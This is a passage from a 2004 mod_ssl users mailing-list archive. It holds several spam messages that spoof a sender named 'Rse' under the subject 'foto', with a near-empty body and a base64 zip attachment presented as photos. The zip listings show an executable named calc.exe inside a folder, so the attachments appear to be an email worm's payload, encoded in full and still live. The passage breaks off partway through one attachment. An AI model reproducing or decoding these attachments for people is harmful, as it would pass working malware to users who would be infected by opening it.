78f0P1BLAQIUABQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAAAAAAAEAIACAgQAAAABmb3Rv
Lmh0bVBLAQIUAAoAAAAAAIqyITEAAAAAAAAAAAAAAAACAAAAAAAAAAAAEgDAQXwAAAAxL1BL
AQIUABQAAAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAAAAAAAAAIgDAgZwAAAAxL2NhbGMuZXhl
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------xrlmwzlmpklsomuczevc--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 14:33:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C352AA8963; Wed,  1 Sep 2004 14:33:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.org (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 24CCFA8934
	for ; Wed,  1 Sep 2004 14:33:34 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:34:25 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------fwazhsgruryiiqrhbqsl"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------fwazhsgruryiiqrhbqsl
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------fwazhsgruryiiqrhbqsl
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------fwazhsgruryiiqrhbqsl--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 14:37:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 713D0A8963; Wed,  1 Sep 2004 14:37:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alexandra.net (St1-C201.eed.usv.ro [80.96.122.244])
	by master.modssl.org (Postfix) with SMTP id CBB4DA8934
	for ; Wed,  1 Sep 2004 14:37:24 +0200 (CEST)
Date: Wed, 01 Sep 2004 15:41:28 +0200
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------whxkwwlpoxawbiyeyzjr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------whxkwwlpoxawbiyeyzjr
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------whxkwwlpoxawbiyeyzjr
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------whxkwwlpoxawbiyeyzjr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 14:58:57 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AE716A8963; Wed,  1 Sep 2004 14:58:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from csie-o4msz8u2k2.net (218-168-220-240.dynamic.hinet.net [218.168.220.240])
	by master.modssl.org (Postfix) with SMTP id 59B34A8934
	for ; Wed,  1 Sep 2004 14:58:48 +0200 (CEST)
Date: Wed, 01 Sep 2004 20:52:16 +0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xsgtitytajskdfjvdwin"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xsgtitytajskdfjvdwin
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------xsgtitytajskdfjvdwin
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBBQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAZm90by5odG2zySjJzbHj5bLxd/JydQ5R
8HP0dbVVj1BXcPZxDA72dLFVd/YBUlaGJqbmFiaGZrqGQIBGGBqaALGRMVCTv4urk2Mw0ARD
/eTEnGS91IpUdZDp+lBrAFBLAwQKAAAAAACKsiExAAAAAAAAAAAAAAAAAgAAADEvUEsDBBQA
AAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAMS9jYWxjLmV4Ze1af3BUx33fEzKWjQJqAiWmaSwI
dokbnYV0R3FCG52lk2Ei4KyTEDay4d291b13evf2+f2QdGrcypZJQzU4mubndGj+SF1PJk2Z
tIUp8UyCMNQ2DZlCxtN67I6HkIz7YlzXY2isaVWun933Tpy4PZk0zXjcYeH7fbvf7+53v/vd
X9/vnrY/SEiEEFIHKJUI6SBBKn+P9PxwLamReJ1UkpCeyBLyfNemRJl+nqyILIvc1EjqUYgG
tAc+CNQEaA5bNgWd1odtyl+yL1Rm/tMU1J3/zn9E0iBvSy0Ff5kEudoi7KhLx1x8n1oSKsQH
UFcl4nzUVhVXIeRMXUAQ9ZYurNeB/9GgGrn0caBWwAbArVX1Zv43Q1ks9U+9sWsgPfVow5TX
OOD/Hkazf2bavWP6i3PtM5OnS28fnvg0cX9tIO2vBuvAUs5s+KuLF47xNbNn78Onn23gIiZP
zeYJ/tUBlnCzdZS8Bn8GYz6QnOvw6k8/2wj2weRsquQ1lbzGkjfnz4HLv0/iK8TxSkKWn9bO
